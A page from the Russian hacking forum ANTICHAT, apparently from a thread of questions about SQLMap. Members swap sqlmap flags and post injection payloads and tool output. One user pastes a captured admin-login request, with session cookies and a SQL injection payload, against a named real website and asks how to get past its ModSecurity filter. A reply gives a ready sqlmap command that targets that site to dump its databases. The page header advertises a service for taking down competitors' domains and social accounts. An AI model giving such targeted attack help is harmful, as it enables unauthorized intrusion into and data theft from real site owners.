УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Вопросы по SQLMap

Страница 61 из 115

« Первая

111

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#601

28.01.2018, 16:23

panic.ker

Познающий

Регистрация: 25.08.2013

Сообщений: 92

Провел на форуме:
35643

Репутация: 3

Включи -v 3 и --parse-errors, там смотри откуда ноги растут. Еще попробуй --no-cast или --hex, иногда прокатывает. Зачарить пробуй.

#602

01.02.2018, 01:10

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

Провел на форуме:
104689

Репутация: 1

Нашёл слепую SQL injection на сайте но она в профиле аккаунта

Как мне прикрутить сесию или типа того ?

#603

01.02.2018, 01:13

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от Sensoft

↑
Нашёл слепую SQL injection на сайте но она в профиле аккаунта
Как мне прикрутить сесию или типа того ?

куки задать не пробовал ? --cookie=".........."

#604

01.02.2018, 01:17

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

Провел на форуме:
104689

Репутация: 1

Цитата:

Сообщение от BabaDook

↑
куки задать не пробовал ? --cookie=".........."

нет, но ща попробую

#605

01.02.2018, 01:26

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

Провел на форуме:
104689

Репутация: 1

Цитата:

Сообщение от BabaDook

↑
куки задать не пробовал ? --cookie=".........."

Код:

sqlmap identified the following injection point(s) with a total of 147 HTTP(s) requests:
---
Parameter: industry (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: industry=-5813 OR 1546=1546
    Vector: OR [INFERENCE]

базы не показало

и так же высветилась ошибка

Код:

[00:24:05] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system

#606

01.02.2018, 01:28

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

Провел на форуме:
104689

Репутация: 1

Цитата:

Сообщение от BabaDook

↑
куки задать не пробовал ? --cookie=".........."

Так по ошибки он не понял вид BD у меня в приоретете стояла MySQL

я удалил преоритет сейчас глану ещё раз

#607

01.02.2018, 01:29

erwerr2321

Флудер

Регистрация: 19.06.2015

Сообщений: 4,126

Провел на форуме:
759330

Репутация: 147

да, держи нас в курсе

#608

01.02.2018, 01:32

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

Провел на форуме:
104689

Репутация: 1

Цитата:

Сообщение от ms13

↑
да, держи нас в курсе

ок

#609

14.02.2018, 01:24

The404

Новичок

Регистрация: 09.10.2016

Сообщений: 6

Провел на форуме:
1224

Репутация: 0

Всем привет!

Acunetix находит boolean-based blind

POST /admin/admin.php HTTP/1.1

Content-Length: 195

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://dsm-print.ru/

Cookie: SNS=8q3t6fosp0qb982nlqjkb8i3o2; PHPSESSID=2u4rtf0pji3cfe4bou3tnra5n7; _ym_uid=1518504918276952455;

_ym_isad=2; _ym_visorc_44242969=w

Host: dsm-print.ru

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0

Safari/537.21

Accept: */*

enter_admin=%c2%ee%e9%f2%e8&admin_name=if(now()=sy sdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))

OR'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/&admin_password=g00dPa%24%24w0rD

помогите правильно составить запрос sqlmap и раскрутить эту шнягу - что не делаю modsecurity выдает - Error 415 Unsupported Media type

заранее благодарю....

#610

14.02.2018, 01:30

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от The404

↑
Всем привет!
Acunetix находит boolean-based blind
POST /admin/admin.php HTTP/1.1
Content-Length: 195
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer:
http://dsm-print.ru/
Cookie: SNS=8q3t6fosp0qb982nlqjkb8i3o2; PHPSESSID=2u4rtf0pji3cfe4bou3tnra5n7; _ym_uid=1518504918276952455;
_ym_isad=2; _ym_visorc_44242969=w
Host: dsm-print.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0
Safari/537.21
Accept: */*
enter_admin=%c2%ee%e9%f2%e8&admin_name=if(now()=sy sdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))
OR'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/&admin_password=g00dPa%24%24w0rD
помогите правильно составить запрос sqlmap и раскрутить эту шнягу - что не делаю modsecurity выдает - Error 415 Unsupported Media type
заранее благодарю....

Не хорошо по ру работать

sqlmap --random-agent -u 'http://dsm-print.ru/admin/admin.php' --data='enter_admin=&admin_name=*&admin_password=' --dbs --is-dba

__________________________________________________ ____________________

На счёт мод сека, тут надо уже ручками крутить ))

Страница 61 из 115

« Первая

111

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход